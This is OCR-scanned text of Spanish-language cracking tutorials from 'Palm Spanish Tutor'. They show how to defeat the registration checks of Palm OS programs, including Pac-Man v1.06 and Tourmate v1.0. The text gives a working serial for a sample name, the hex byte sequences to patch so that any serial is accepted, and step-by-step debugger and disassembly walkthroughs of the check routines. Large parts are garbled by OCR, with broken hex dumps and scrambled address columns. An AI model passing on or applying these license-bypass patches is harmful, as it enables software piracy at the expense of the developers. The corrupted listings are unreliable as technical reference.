0003BBC0O: 00 00 00 00 00 00 00 00 00 00 00 00 00 09 00 00 "..iccccccoo...... is 


0003BBDO0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 "..cccccoooo..... m 


0003BBEO0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ""....c.oooo....... 
0003BBFO0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 "....cc.oooo....... di 
dm d6 50 <-—-— Aquí se almacena el serial falso 

000049C6: 31 32 33 34 35 00 4D 2F 00 28 00 00 59 30 10 00 "12345.M/ (a. Oi 
000049D6: 17 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ".4.............. " 
000049E6: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 "....c..oooo....... " 
000049F6: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 "....c.c.oooo....... " 
00004A06: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 "....c..oooo....... q 


Y Para un HotSync/Name: compaq , El serial es 


El serial es 


Y Para un HotSync/Name: Benancio s 
PASO Il : Registrase correctamente : 


Borrando todo y cargando todo ,registraremos con el serial verdadero que encontramos 
para saber a donde andamos al dar click el Emulador (Cuando introducimos el serial 
valido por supuesto)nos manda a: 


Initializing parser... 
Initializing lex... 
Installing keywords... 
Initializing eval... 
Initializing exec... 
Loading startup script... 


Deb0ut = false 

SymbolsO0n = true 

StepRegs = false 

ReadMemHack = false 

Attached = false 

dot address = 00000000 

last address = 00000000 

last count = 00000000 

att 

EXCEPTION ID = $80 

'"TargetCfgRoutines' 

+$00FO 1018871C  *LINK A6,$0000 | 4E56 0000 

atb "DlkGetSyncInfo" 

A-trap set on 02a9 (DlkGetSyncInfo) 

9 

EXCEPTION ID = $80 
0005EF9C  *_D1kGetSyncInfo ?¿ $100535FA 4E4F A2A9 

41 
0005EF9C  *_D1kGetSyncInfo ?¿ $100535FA 4E4F A2A9 
O005EFAO MOVE.L A4,-(A7) 2F0C 
0005EFA2 PEA *+$0010 ; O005EFB2 487A 000 
O005EFA6 PEA *+$0006 ¿ O005EFAC 487A 0004 
O005EFAA ADDI.L +$5000030FA, (A7) A O 0697 0000 30FA 
0005EFBO RTS (JSR) ; 30FFEFAC 4E75 
0005EFB2 MOVE .L DO,D5 2A00 
0005EFB4 TST.B (A4) 4A14 
0O005EFB6 LEA $002C(A7) ,A7 4FEF 002€ 
O005EFBA BNE.S *+$0004 ; OO0O05EFBE 6602 

t 


EXCEPTION ID = $80 


O0O05EFAO *MOVE.L Ad, -(A7) 2F0C 

O005EFA2 *PEA *+50010 ; O005EFB2 487A 000E 
O0O05EFAG  *PEA *+50006 ¿ OOO5EFAC 487A 0004 
OO05EFAA *ADDI.L *+S5000030FA, (A7) E 0697 0000 30FA 
O005EFBO *RTS(JSR) ¡ 30FFEFAC 4E75 

000620A6 *MOVEM.L D3-D5/A2-A3,-(A7) 48E7 1C30 
000620AA  *LEA -$0014(A7),A7 4FEF FFEC 


Cuando llegemos hasta aqui vemos el siguiente código...... 


0005F038  *ADDO.W $+$504,A7 584F 
0005F03A *TST.B -$35A2(A5) 4A2D CA5E 
Will Not Branch 
0005F03E *BEQ.S *+$0050 ; 0005FO8E 674E 
0005F040 *LEA *+S00EC,A0 ¿ 0005F12C 41FA O0EA 
0005F044 *PEA (A0) 4850 
0005F046 *LEA *+500E8,A0 ¿ 0005F12E 41FA 00E6 
0005F04A *PEA (A0) 4850 
0005F04C  *LEA *+500E4,A0 ¿ 0005F130 41FA 00E2 
0005F050  *PEA (A0) 4850 
0005F052 *MOVE.W FSO3EA, - (A7) A E 3F3C 03EA 


0005F056 *_FrmCustomAlert 


Registration 


PAC-MAN 


Input Registration Key. 
49784 


OO A E rancalo 
Information 


9) Thank you for 
registering! 


g <--- Aqui el debugger salta al emulador con el mensaje "Thank you for registering" , 
La parte superior de esta ventana contien 1] mensaje Óó mensaje de titulo 
"Information" y podemos encontarla en el PRCexplorer v1.0.18.5 como :1002(0x03ea), 
cuyo mensaje de agradecimiento aparece como "*1" texto que toma de otra parte del 
código que el programador creó, el "*1" nos dice qu sta ventana puede escribir 
varios mensajes. 


PASO IV : Analizando parte del código vivo encontrado. 


La parte critica de código vivo que nos intereza es: 
; OJO AQUI COMPARA DOS REGISTROS 
Will Not Branch 


+ EN 
; NO SALTA CON SERIAL FALSO 


Analizando con el Palmdemon v0.27 
(CODE: 0Ox01) 


00007B59 70 00 MOVE.L +50, DO 


00007B5B 10 32 30 00 MOVE.B $S0(A2, D3.0W), DO 

00007B5F 41 ED CA 30 LEA.L VAR_35D0, AO 

00007B63 12 30 30 24 MOVE.B $24(A0, D3.W), D1 

00007B67 48 81 

<—— Comparar serial falso con el seal 

00007B6B 66 08 BNE.S LOC_7B75 

00007B6D 52 43 ADD.W $+$1, D3 
loc_7B6F: 

00007B6F 0C 43 00 05 CMP .W $+$50005, D3 

00007B73 6D E4 BLT.S LOC_7B59 
loc_7B75: 

00007B75 0C 43 00 05 CMP .W $+$50005, D3 

00007B79 66 06 BNE.S Loc_7B81 

00007B7B 1B 7C 00 Ol MOVE.B $+$7C, S1(A5) 

00007B7F CA 5E AND.W (A6)+, D5 
loc_7B81: 

00007B81 2F 0A MOVE.L A2, -(A7) 

00007B83 4E 4F AO 12 SysTrap MemChunkFree 

00007B87 58 4F ADD.W $54, A7 
loc_7B89: 

00007B89 4A 2D CA 5E TST.B VAR_35A2 

00007B8D 67 4ÉE BEOQ.S LOC_7BDD 

00007B8F 41 FA 00 EA EA.L SEA(PC), AO 

00007B93 48 50 PEA.L (A0) 

00007B95 41 FA 00 E6 EA.L SEG (PC), AO 

00007B99 48 50 PEA.L (A0) 

00007B9B 41 FA 00 E2 EA.L SE2 (PC), AO 

00007B9F 48 50 PEA.L (A0) 

00007BA1 3F 3C 03 EA MOVE .W FSO3EA, -(A7) 

00007BA5 4E 4F Al 94 SysTrap FrmCustomAlert 

00007BA9 3F 3C 03 F7 MOVE .W +S03F7, -(A7) 

00007BAD 3F 3C 03 EC MOVE .W +S03EC, -(A7) 

00007BB1 4E 4F Al 7E SysTrap FrmGetFormPtr 


OPCION II: VALIDAR CUALQUIER SERIAL 


<---- Comparar serial falso con el real 


<---- Parchar esta instrucción. 


Ahora abrimos el editor hexadecimal favorito y buscamos la cadena 


10 32 30 00 41 ED CA 30 12 30 30 24 48 81 B2 40 66 08 


Parchamos por , para hacer que se compare así mismo el registro DO con el DO: 


10 32 30 00 41 ED CA 30 12 30 30 24 48 81 B1 40 66 08 


Guardamos los cambios y cargamos nuestro Pac-Man v1.06 en la Palm Zire 72 y 
efectivamente , al registrarnos nos valida cualquier serial, y además al adelantar el 
reloj de la Palm este trabaja bien, Intentamos registrarnos nuevamente y parece que ya 
no nos aparece la función de registrar, Próximamente haremos un KeyGen. 


Hasta el próximo tutorial 


Saludos 


En algún lugar de América Visor 


Palm Spanish Tutor: Página dedicada a la divulgación de información en Castellano, sobre Ingeniería 


Inversa y Programación en Palm. E-mail "Colabora con tus Proyectos" 


Palm Spanish Tutor 


()Serial (X)HotSync/ Code (X)Trial ( )Multiprotección ()Encriptado ( )Otro 


Registrarse navegando por el Código vivo 
(O NewBies ( )Intermedio ()Avanzado ( )Master ( )Gúru 
SouthDebugger, PRCedit, PilotDis. POSE Palm emulador, UltraEdit-32, PalmDemon 0.27 


INTRODUCCION 


Esta programa tiene bien cimentado que se deben de tener pocas pistas para crackearlo, pues al desensamblar 
con PalmDemon 0.27 no se nos muestra ninguna ventana de mal registro como esta: 


AR AR 


ver. 32.000 ver. 3.2.000 


Message To unlock the all capabilities of the 
gome you must buy it to get a code 
Incorrect code! Wessage 
Please, refer to the 


“Troubleshooting 


Successful registration! 
section" of the Manual Thanks 3 please, 


on the PC. 


y 


restart. 


Tampoco aparece el texto de la ventana en alguna referencia "STRING" ni en el PalmDemon v0.27 ni en el 
PRCExplorer, Usaremos el PalmDebugger Primero encontraremos el serial real y después seguiremos 
instrucción tras instrucción para saber a donde se ocultan las ventanas de mensajes. 


AL ATAQUE 


Con nuestro 
HotSync.Name: Compaq 
Code: 1234567890 


Cargamos el debugger y ponemos un breakpoint con la API atb "FrmCustomAlert" 


Esto es lo que veremos 
Initializing parser... 
Initializing lex... 
Installing keywords... 
Initializing eval... 
Initializing exec... 
Loading startup script... 


con el PalmDemon: 


Deb0ut = false 
SymbolsOn = true 
StepRegs = false 
ReadMemHack = false 
Attached = false 
dot address = 00000000 
last address = 00000000 
last count = 00000000 
att 
EXCEPTION 1D = $80 
'"TargetCfgRoutines' 

+S00FO 1018871C  *LINK A6,$0000 
atb "FrmCustomAlert" 
A-trap set on 0194 (FrmCustomAlert) 
g 
EXCEPTION 1D = $80 

00089084  *_FrmCustomAlert 

dm a6 200 <-—— Inmediatamente observamos que 
000072D0: 31 31 00 03 F3 5€ 60 00 00 04 01 
000072E0: 00 18 02 00 2B 89 01 12 00 00 31 
000072F0: 34 31 00 14 02 00 01 00 00 1A 02 
00007300: 00 00 31 33 34 32 34 39 34 31 31 
00007310: 80 00 1B DE 00 00 10 2D 73 FO 80 
00007320: 10 28 00 00 73 26 49 6E 70 75 74 
00007330: 00 0E 80 00 00 00 00 00 73 3A 50 
00007340: 6F 74 “73 79 6E 63 20 75 73 65 72 
00007350: OD 43 6F 6D 70 61 71 00 20 20 20 
00007360: 20 20 20 20 20 20 20 20 20 20 20 
00007370: 20 20 20 20 20 20 20 20 20 20 20 
00007380: 20 20 20 20 20 20 20 20 20 20 20 
00007390: 20 20 20 00 05 7A 00 03 00 2F 00 
000073A0: 00 00 00 00 00 00 00 00 00 00 00 
000073B0: 00 50 00 00 00 00 00 00 00 00 00 
000073C0: 00 3F 00 24 00 0C 00 00 73 DO E9 
000073D0: 4F 4B 00 00 05 7C 00 2D 00 3F 00 
000073E0: 73 E8 E9 00 00 00 00 00 43 61 6ÉE 
000073F0: 00 93 00 40 00 00 00 58 02 00 2C 
00007400: 35 36 37 38 39 30 00 72 65 67 69 
00007410: 69 6F 6E 20 63 6F 64 65 20 68 65 
00007420: 00 00 00 00 00 01 00 00 00 00 00 
00007430: 00 01 00 00 00 00 00 O1 00 00 00 


; $1006969C 


hay en la memoria 
cr 80 04 01 00 
33 34 32 34 39 
00 2B 89 01 32 
31 00 BC 00 00 
00 1B D4 00 00 
00 05 79 00 02 
61 6C 6D 20 68 
6E 61 6D 65 3A 
20 20 20 20 20 
20 20 20 20 20 
20 20 20 20 20 
20 20 20 20 20 
9A 00 0C F2 48 
00 00 00 00 00 
00 05 7B 00 04 
00 00 00 00 00 
24 00 0€ 00 00 
63 65 6C 00 00 
10 31 32 33 34 
73 74 72 61 74 
72 65 00 00 01 
01 00 00 00 00 
00 00 01 00 00 


| 4E56 0000 


| 4E4F A194 


Tolo SE TAPput Vos" 
lata eii s:Palm h" 
"otsync username:" 


MICompadgpB ds 


lso” 


MSc a Cancel.." 


a NOAA 23 4 
"EL YEE!N.registrat" 


"ion code here..." 


00007440: 00 00 00 00 00 00 00 00 00 00 00 00 80 00 1A A2 A a " 


00007450: 00 00 OF 8F 00 AO 00 52 00 03 6€ 20 41 00 00 00 AA R..1 A..." 
00007460: 00 00 00 AO 00 52 00 00 00 00 00 9F 00 51 00 03 Cas Rosario Qu" 
00007470: 6C 10 00 00 00 03 DA AO 00 00 72 B2 80 00 1A 72 Ml Put" 
00007480: 00 00 OF 77 00 02 00 0B 00 03 FF 4C 41 00 00 00 A LA..." 
00007490: 00 00 00 02 00 0B 00 00 00 00 00 01 00 OA 00 03 SE alta il 
000074A0: FF 3C 00 00 00 03 DA AO 00 00 74 54 80 00 1A 42 Mai tT...B" 
000074B0: 00 00 OF 5F 03 00 00 00 4D 68 03 00 00 00 4D 68 Wasi id Ms Mb" 
000074C0: 03 00 00 00 4D 68 03 00 00 00 4D 68 03 00 00 00 Wii Misa MA 
il <--- Presionamos para saber en que parte del código andamos 
0008908A  *_FrmCustomAlert ; $1006969C | 4E4F A194 
0008908E LEA S000E (A7),A7 | 4FEF 000E 
00089092 RTS | 4E75 
00089094  MOVE.L D3,-(A7) | 2F03 
00089096 MOVE.B $0008(A7),D3 | 162F 0008 
0008909A  MOVE.B D3,-(A7) | 1F03 
0008909€ JSR *+567C0 ; 0008F85C | 4EBA 67BE 
000890A0  TST.B DO | 4A00 
00089042  ADDQO.W S02,A7 | 544F 
000890A4 BEQ.S *+5000A ; 000890AE | 6708 
t <--—- Al presionar para ver la siguiente instrucción no la muestra. 


Error: not attached to remote. 


El serial verdadero resulta ser 42494 .para un HotSync/Name: Compaq 
Al registrarnos correctamente esta ventana aparece. 


EA 


ver. 3.2.000 
To unlock the all copabilities of the 
game you must buy it to get a code 
WMessage 


D Successful registration! 
Thanks 3 please, 


restart. 


Ahora procedemos a hubicar el código que nos mostró el comando "'il'' , saber a donde estamos usando el Palmdemon 
v0.27 , (Podemos guiarnos de las direcciones hexadecimales que muestra el PalmDebugger depues del simbolo "'["", 
Buscaremos alguna coincidencia para "4E 4F Al 94 " observando que s ncuentre un 
FrmCustomAlert y que coincidan las instrucciones de arriba y abajo del código vivo 
contra el código muerto. 


Esto es lo que vemos 


ARA ARA 


ver. 3.2.000 ver. 3.2.000 
Message To unlock the all capabilities of the 
game you must buy it to get a code 
Message 


incorrect code! 
Please, refer to the 


“Troubleshooting D Successful registration! 


section” of the Manual 
on the PC. 


Thanks 3 please, 
restart. 
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Palm Spanish Tutor 


()Serial (X)HotSync/ Code ()Trial ()Multiprotección ( )Encriptado ( )Otro 


Validar cualquier serial 
(O NewBies ()Intermedio ()Avanzado ( )Master ( )Gúru 
AMLO | rEcha: M/22/03/2005 


INTRODUCCION 


Cargar debugger, Emulador y poner breakpoint (atb "frmalert") caemos en al dar un click desde el emulador: 


AL ATAQUE 
il 
0004B4DA *_FrmAlert ; $10069070 | 4E4F A192 
0004B4DE MOVEO.L +$01,DO | 7001 
0004B4E0 BRA.W *+5002A ; 0004B50A | 6000 0028 
0004B4E4 MOVE.L D3,(A2) | 2483 
0004B4E6 MOVE.W +$235E,-(A7) ; '*F' | 3F3C 235E <--— Ventana de agradecimiento 
0004B4EA _FrmAlert ; $10069070 | 4E4F A192 


0004B4EE 
0004B4F2 
0004B4F6 


Desensamblamos 


00001AF2 
00001AF4 
00001AF8 
00001AFC 
00001AFE 


loc_1B00: 


00001B00 
X-ref to 
00001B04 
00001B08 


MOVE.W +$03E8,-(A7) ; 'h.' | 3F3C 03E8 
_FrmGotoForm ; $10069DBE | 4E4F A19B 
MOVEQ.L +$01,DO | 7001 


con el paldemon 0.27 y: 


08 
00 
FC 
40 
OE 


MOVE.L AO, -(A7) 

00 D4 BSR.W SUBROUTINE_1C6C 
00 14 ADDA.W +$0014, A7 
TST.W DO 

BNE.S LOC_1BOE <-—-—- Cambiar por un BRA (60) 


<--- Ira esta subrutina (Sospechosa) 


3F 3C 23 5C MOVE.W +$235C, 
Alert (Wrong key) 

4E 4F Al 92 SysTrap FrmAlert 
70 01 MOVE.L +$1, DO 


-(A7) <--- Talt de mal registro 


00001B0A 60 00 
loc_1BO0E: 

00001B0OE 24 83 
00001B10 3F 3C 
X-ref to Alert 
00001B14 4E 4F 
loc_1B18: 

00001B18 3F 3C 


00 28 BRA LOC_1B34 


MOVE.L D3, (A2) 

23 5E MOVE.W $$235E, -(A7) <-—-— Talt de agradecimiento 
(Thank you) 

Al 92 SysTrap FrmAlert 


03 E8 MOVE.W +$$03E8, -(A7) 


X-ref to Form (LClock) 


00001B1C 4E 4F 
00001B20 70 01 
00001B22 60 00 
loc_1B26: 

00001B26 0C 50 
00001B2A 66 00 
00001B2E 2F 08 
00001B30 61 00 
loc_1B34: 

00001B34 4C EE 
00001B36 04 18 
00001B38 FF F4 
00001B3A 4E 5E 
00001B3C 4E 75 
00001B3E 28 6E 
00001B42 20 73 
00001B46 29 00 


Si cambiamos 
O0001AFE 66 O0E 


Por: 


00001AFE 60 OE 


Al 9B SysTrap FrmGotoForm 
MOVE.L $1, DO 
00 10 BRA LOC_1B34 


00 15 CMP.W +$0015, (AO) 

FF 5E BNE LOC_1A8A 

MOVE.L AO, -(A7) 

02 FE BSR.W SUBROUTINE_1F52 


SUB.B +$18, (A0)+ 

DC.W fFEFF4 

UNLK.L A6 

RTS 

6F 74 move.l $6F74(a6), a4 

65 74 move.1l $74(a3, d6.w), a0 
move.l1 d0, -(a4) 


BNE.S LOC_1BOE <--—— Cambiar por un BRA (60) 


BRA.S LOC_1BOE <--—— Cambiar por un BRA (60) 


Al registrarnos únicamente nos sale la ventana de agradecimiento, pero sigue sin 
registrar, Dejamos parchada la instrucción y revisamos más abajo y observamos: 


La trampa esta 
ahí: 


en la subrutina en 00001AF4 61 00 00 D4 BSR.W SUBROUTINE_1C6C ,Vallamos 


SubRoutine_1C6C: 


00001BCA 4E 56 
00001BCE 48 E7 
00001BD0O 1F 00 
00001BD2 2C 2E 
00001BD6 2E 2E 
00001BDA 2A 2E 
00001BDE 2F 06 


00 00 LINK. L AG, $*+0 <--- Este Link siempre llama al último RTS 


MOVE.B DO, -(A7) 

00 08 MOVE.L $8(A6), D6 

00 0C MOVE.L $C(A6), D7 

00 10 MOVE.L $10(A6), D5 
MOVE.L D6, -(A7) 


Cortamos código u nos vamos a: 


El RTS esta más abajo del código desensamblado en: 


00001C22 2F 04 
00001C24 4E 4F 
00001C28 2F 05 
00001C2A 2F 04 


MOVE.L D4, -(A7) 
AO C6 SysTrap StrCat 
MOVE.L D5, -(A7) 
MOVE.L D4, -(A7) 


00001C2C 4E 4F AO C6 SysTrap StrCat 

00001C30 2F 04 MOVE.L D4, -(A7) 

00001C32 61 00 01 6C BSR.W SUBROUTINE_1E2A 

00001C36 2F 04 MOVE.L D4, -(A7) 

00001C38 61 00 00 F2 BSR.W SUBROUTINE_1D6E 

00001C3C 26 00 MOVE.L DO, D3 

00001C3E DE FC 00 1C ADDA.W +$001C, A7 

00001C42 2E 85 MOVE.L D5, (A7) 

00001C44 2F 2E 00 14 MOVE.L $14(A6), -(A7) 

00001C48 61 00 00 A2 BSR.W SUBROUTINE_1D1A 

00001C4C 50 4F ADD.W +$8, A7 

00001C4E BO 83 CMP.L D3, DO 

00001C50 67 0C BEQ.S LOC_1C5E 

00001C52 2F 04 MOVE.L D4, -(A7) 

00001C54 4E 4F AO 12 SysTrap MemChunkFree 
<-—-—-- Aqui cambiar por un "Move.Q +$1,DO0" (Hexa 7001) 

00001C5A 60 00 00 0A BRA LOC_1C66 

loc_1C5E: 

00001C5E 2F 04 MOVE.L D4, -(A7) 

00001C60 4E 4F AO 12 SysTrap MemChunkFree 

00001C64 70 01 MOVE.L +$1, DO 

loc_1C66: 

00001C66 4C EE 

00001C68 00 F8 DC.W +00F8 

00001C6A FF EC DC.W FFFEC 

00001C6C 4E 5E UNLK.L A6 

00001C6E 4E 75 ¡HEM 


Al hacer el cambio nos queda 


00001C4C 50 4F ADD.W +$8, A7 

00001C4E BO 83 CMP.L D3, DO 

00001C50 67 0C BEQ.S LOC_1C5E 

00001C52 2F 04 MOVE.L D4, -(A7) 

00001C54 4E 4F AO 12 SysTrap MemChunkFree 


00001C58 70 01 MOVE.OQ +$1,DO <--—-—- Aquí cambiamos la instrucción 
00001C5A 60 00 00 OA BRA LOC_1C66 
loc_1C5E: 


00001C5E 2F 04 MOVE.L D4, -(A7) 
00001C60 4E 4F AO 12 SysTrap MemChunkFree 
00001C64 70 01 MOVE.L +$1, DO 


Así al cargar el PRC y registrarnos nos valida cualquier serial y cuando se carga nos 
sigue validando el serial que introducimos, Si borramos el la primer modificación nos 
daremos cuenta que no es necesario cambiar por un BRA en: 

O0O0001AFE 66 OE BNE.S LOC_1BO0E 

Solo es necesario parchar la última instrucción en 

00001C58 42 40 CLR.W DO Por 00001C58 70 01 MOVE.O ¿f1,DO 


De esta manera hemos tenido éxito al verificar las modificaciones en en mi Palm 
Tungteng T5 Real,Vamos a la ventana de Info en el PRC y encontramos que aparece una un 
letrero que dice registrado a ...... 
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(OSerial ()HotSync/ Code ()Trial ()Multiprotección ( )Encriptado ( )Otro 
Encontrar el serial navegando por el código vivo 

(O NewBies ( )Intermedio ()Avanzado ( )Master ( )Gúru 
SouthDebugger, PRCedit, PilotDis. POSE Palm emulador, UltraEdit-32, PalmDemon 0.27 


INTRODUCCION 


Cargamos el juego. Tourmate v1.0 y al iniciar la aplicación aparece esta ventana. 


First Marne Benito 
Lost Marne Stocy 


Registry Key 1234567890 


[ Register ] [Try ) 


Para este Ejemplo usaremos como registro los siguientes datos 
First Name : Benito 


Second Name : Stacy 
Registry Key : 1234567890  <---- Falso serial por supuesto 


Si nos falta introducir los valores completos aparece: 


Registration Form 


First Marne 98 


Last Narne 


Database Error 


Warning Incomplete 


Registry Forra 


Si no acertamos al serial nos aparece: 


Registration Form 


First Nome 1 


Database Error 


Ea 'WWessage...Invalid 
Registration! Get 
Registrated at 
www. palrmix.itil cora 


Buscando este error en el PalmDemon v0.27 encontramos que esta en 1200 (0x4B0) 


EA Gatahazs Error 3] Registration_Error 


1200 (0x4B.0] 1000 [0x3E 8] 1100 (0x44C] 


Entrando al programa esto se nos muestra: 


Tourmate(palmix.itil.com) 


vw German w Enquiries 


How rnuch is the fore to........? 


Where is the neorest hos 
How rnuch is the roorn fore? + 


Gibt es hee-ar ao-in qu-tes hotel? 


[ Help ] (2 00 rn] [ Exit ] 


AL ATAQUE 


Paso 1 : Cargar el emulador y el debugger 


Primero desensamblemos párte del código con el palmdemon 0.27 y hubiquemonos a donde caeremos según las alertas 
que encontramos 


00001AF4 00 DF DC.W *00DF 
00001AF6 81 13 OR.B DO, (A3) 
00001AF8 2F 0B MOVE.L A3, -(A7) 
00001AFA 2F 0A MOVE.L A2, -(A7) 
00001AFC 4E 4F Al 50 SysTrap FldSetAttributes 
00001B00 2F 0C MOVE.L A4, -(A7) 
00001B02 4E 4F Al 71 SysTrap FrmDrawForm 
00001B06 78 01 MOVE.L +$$1, D4 
00001B08 4F EF 00 84 LEA.L $84(A7), A7 
loc_1B0C: 
00001B0C 10 04 MOVE.B D4, DO 
00001BO0E 4C DF 
00001B10 1C F8 4E 5E MOVE.B $4E5E, (A6)+ 
00001B14 4E 75 RIS 
00001B16 80 26 OR.B -—(A6), DO 
00001B18 5A 6F 6F 6D ADD.W +$5, $6F6D(AT7) 
00001B1C 46 69 65 6C NOT.W $656C(A1) 
00001B20 64 46 BCC.S LOC_1B68 
00001B22 6F 72 BLE.S LOC_1B96 
00001B24 6D 48 BLT.S LOC_1B6EÉ 
00001B26 61 6E BSR.B LOC_1B96 
S 
Ss 


00001B28 64 6C BCC.S LOC_1B96 

00001B2A 65 45 BCS.S $1B71 

00001B2C 76 65 MOVE.L +*$65, D3 

00001B2E 6E 74 BGT.S $1BA4 

00001B30 5F 5F SUB.W +57, (A7)+ 

00001B32 46 50 NOT.W (AO) 

00001B34 39 45 76 65 MOVE.W D5, $7665(A4) 
00001B38 6E 74 BGT.S LOC_1BAE 

00001B3A 54 79 70 65 00.. ADD.W +52, $70650000 
00001B40 00 00 OR.B +$0, DO 

00001B42 4E 56 FF C4 LINK.L A6, +*-$3C 

00001B46 48 E7 

00001B48 1F 38 42 2E MOVE.B $422E, -(A7) 
00001B4C FF D1 DC.W HFEFD1 

00001B4E 7E 00 MOVE.L +$0, D7 

00001B50 7C 00 MOVE.L +$0, D6 

00001B52 42 6ÉE FF C8 CLR.W -$38(A6) 

00001B56 42 6E FF C6 CLR.W -$3A(A6) 

00001B5A 42 6ÉE FF C4 CLR.W -$3C(A6) 

00001B5E 20 6E 00 08 MOVE.L $8(A6), AO 
00001B62 30 10 MOVE.W (A0), DO 

00001B64 04 40 00 09 SUB.W +$0009, DO 
loc_1B68: 
00001B68 67 0C BEQ.S LOC_1B76 
00001B6A 04 40 00 OF SUB.W *+$000F, DO 
loc_1B6E: 

00001B6E 67 00 01 E6 BEQ LOC_1D56 
00001B72 60 00 02 0C BRA LOC_1D80 
loc_1B76: 

00001B76 20 6E 00 08 MOVE.L $8(A6), AO 
00001B7A 30 28 00 08 MOVE.W $8(A0), DO 
00001B7E 04 40 04 53 SUB.W +$0453, DO 
00001B82 67 0A BEQ.S LOC_1B8E 

00001B84 53 40 SUB.W +$1, DO 

00001B86 67 00 01 60 BEQ LOC_1CE8 
00001B8A 60 00 01 F4 BRA LOC_1D80 
loc_1B8E: 

00001B8E 7E 00 MOVE.L +$0, D7 


Yu 


Yu 


00001 
00001 
1B96: 
00001 
00001 
1B9A: 
00001 
00001 
00001 
00001 
00001 
00001 
00001 
1BAE: 
00001 
00001 
00001 
00001 
00001 
00001 
00001 
00001 
00001 
00001 
00001 
00001 
00001 
00001 
00001 
1BD8: 
00001 
00001 
00001 
00001 
00001 
00001 
00001 
00001 
00001 
1BFO: 
00001 
00001 
1BF6: 
00001 
00001 
00001 
00001 
00001 
00001 
1C08: 
00001 
00001 
00001 
00001 
loc_1 
00001 
00001 
00001 
00001 
1C20: 
00001 
00001 
00001 
00001 
00001 


loc_ 


loc_ 


loc 


loc_ 


loc_ 


loc_ 


loc_ 


loc 


00001 


B90 
B94 


B96 
B98 


B9A 
B9C 
BAO 
BA2 
BA6 
BAS8 
BAA 


BAE 
BBO 
BB2 
BB4 
BB6 
BB8 
BBC 
BBE 
BC2 
BC4 
BC8 
BCA 
BCE 
BD2 
BD6 


BD8 
BDA 
BDE 
BEO 
BE2 
BE4 
BE8 
BEC 
BEE 


BFO 
BF4 


BF6 
BFA 
BFE 
Cco2 
CO04 
C06 


Cc08 
coc 
COE 
c10 


EZ 


c12 
c16 
c1c 
C1E 


c20 
Cc22 
C26 
Cc28 
C2A 
Cc2c 


4E 
28 


78 
60 


30 
06 
3F 
4E 
26 
2F 
4E 


3C 
4A 
5C 
66 
TE 
41 
48 
41 
48 
41 
48 
3F 
4E 
4F 
60 


2F 
4E 
32 
20 
E5 
43 
2.3 
52 
58 


el 
6D 


0c 
67 
24 
76 
TA 
60 


0c 
30 
66 
52 


41 
11 
9Z 
52 


2F 
4E 
B6 
58 
64 
0c 


4F 
48 


00 
56 


04 
40 
00 
BA 
48 
0B 
4F 


00 
46 
4F 
22 
01 
FA 
50 
FA 
50 
FA 
50 
3C 
4F 
EF 
1E 


0B 
4F 
44 
09 
88 
EE 
88 
44 
4F 


44 
AZ 


47 
00 
6E 
00 
00 
18 


32 
00 
02 
43 


EE 
B2 
43 
45 


OA 
4F 
40 
4F 
06 
45 


Al 73 SysTrap FrmGetActiveForm 


MOVE . 


L AO, 


MOVE . 


L +S0, 
BRA.S LOC_1BFO 


AZ 


D4 


MOVE.W D4, DO 

04 4D ADD.W +$044D, DO 

MOVE.W DO, -—(A7) 

EB 16 JSR.L GETOBJECTPTR__FUS 
MOVE.L AO, A3 

MOVE.L A3, -(A7) 

Al 4B SysTrap FldGetTextLength 
MOVE.W DO, D6 

TST.W D6 

ADD.W $6, A7 

BNE.S LOC_1BD8 

MOVE.L +$1, D7 

01 FC LEA.L S$1FC(PC), AO 
PEA.L (AO) 

01 F8 LEA.L $1F8(PC), AO 
PEA.L (AO) 

02 10 LEA.L $210(PC), AO 
PEA.L (AO) 


03 E8 MOVE.W +$03E8, 


-(A7) 


Al 94 SysTrap FrmCustomAlert 


00 OE 
BRA.S 


MOVE. 1 
Al 39 


LEA.L 
LOoc_1 


L A3, 


SE(A7), A7 
BF 6 


-(A7) 


SysTrap FldGetTextPtr 
MOVE .W D4, 


MOVE. 1 
LSL.L 
FF F4 
08 00 
ADD.W 
ADD.W 


00 03 
BLT.S 


00 01 
01 84 
Fr FC 
MOVE. 1 


L Al, 
$32, 
LEA.L 
MOVE. 
+51, 
$54, 


Al 
DO 
DO 
-S$C(A6), Al 


L AO, $0(Al, DO.W) 


D4 
A7 


CMP.W ++$0003, D4 


Loc_1 


B9A 


CMP.W +$0001, D7 


BEO L 
MOVE . 
L SO, 


MOVE. 1 


L SO, 


0C_1D80 

L -$4(A6), A2 
D3 

D5 


BRA.S LOC_1C20 


00 2D CMP.B +$32, $2D(A2, 
MOVE.W DO, 


BNE.S 
ADD.W 


FF EA 
30 00 
ADD.W 
ADD.W 


Loc_1 
Sl, 


LEA.L 
ais 
*$l, 
$$l, 


MOVE.L A2, 


A0 C7 
CMP .W 
ADD.W 
BCC.S 
00 09 


SysTr 
DO, D 
$S4, 

Loc_1 


DO 
c12 
D3 


-$16(A6), AO 
MOVE.B $0(A2, 
D3 
D5 


-(A7) 

ap StrLen 
3 

A7 

C32 


CMP.W +$0009, D5 


DO.W) 


D3.W), 


$0(A0, 


D5.W) 


00001C30 6D D6 BLT.S LOC_1C08 
loc_1C32: 
00001C32 41 EE FF EA LEA.L -S$16(A6), AO 


00001C36 42 30 50 00 CLR.B $0(A0, D5.W) 
00001C3A 48 6E FF EA PEA.L -$16(A6) 


00001C3E 4E 4F AO CE SysTrap StrATolI 

00001C42 2D 40 FF CA MOVE.L DO, -$36(A6) 

00001C46 41 FA 01 98 LEA.L $198(PC), AO 

00001C4A 48 50 PEA.L (AO) 

00001C4C 2F 2E FF F8 MOVE.L -$8(A6), -(A7) 

00001C50 2F 2E FF F4 MOVE.L -SC(AG6), -(A7) 

00001C54 48 6D FC 9E PEA.L VAR_362 

00001C58 4E BA E8 C8 JSR.L SETREGISTRYFORMAT__B8REGISTRYFPCPCPC 
00001C5C 2F 2E FF CA MOVE.L -$36(A6), -(A7) 

00001C60 48 6D FC 9E PEA.L VAR_362 

00001C64 4E BA E6 64 JSR.L SETREGISTRATIONFLAG_ _8REGISTRYFUL 
00001C68 48 6D FC 9E PEA.L VAR_362 

00001C6C 4E BA E5 A8 JSR.L LOC_216 

00001C70 4A 00 TST.B DO 

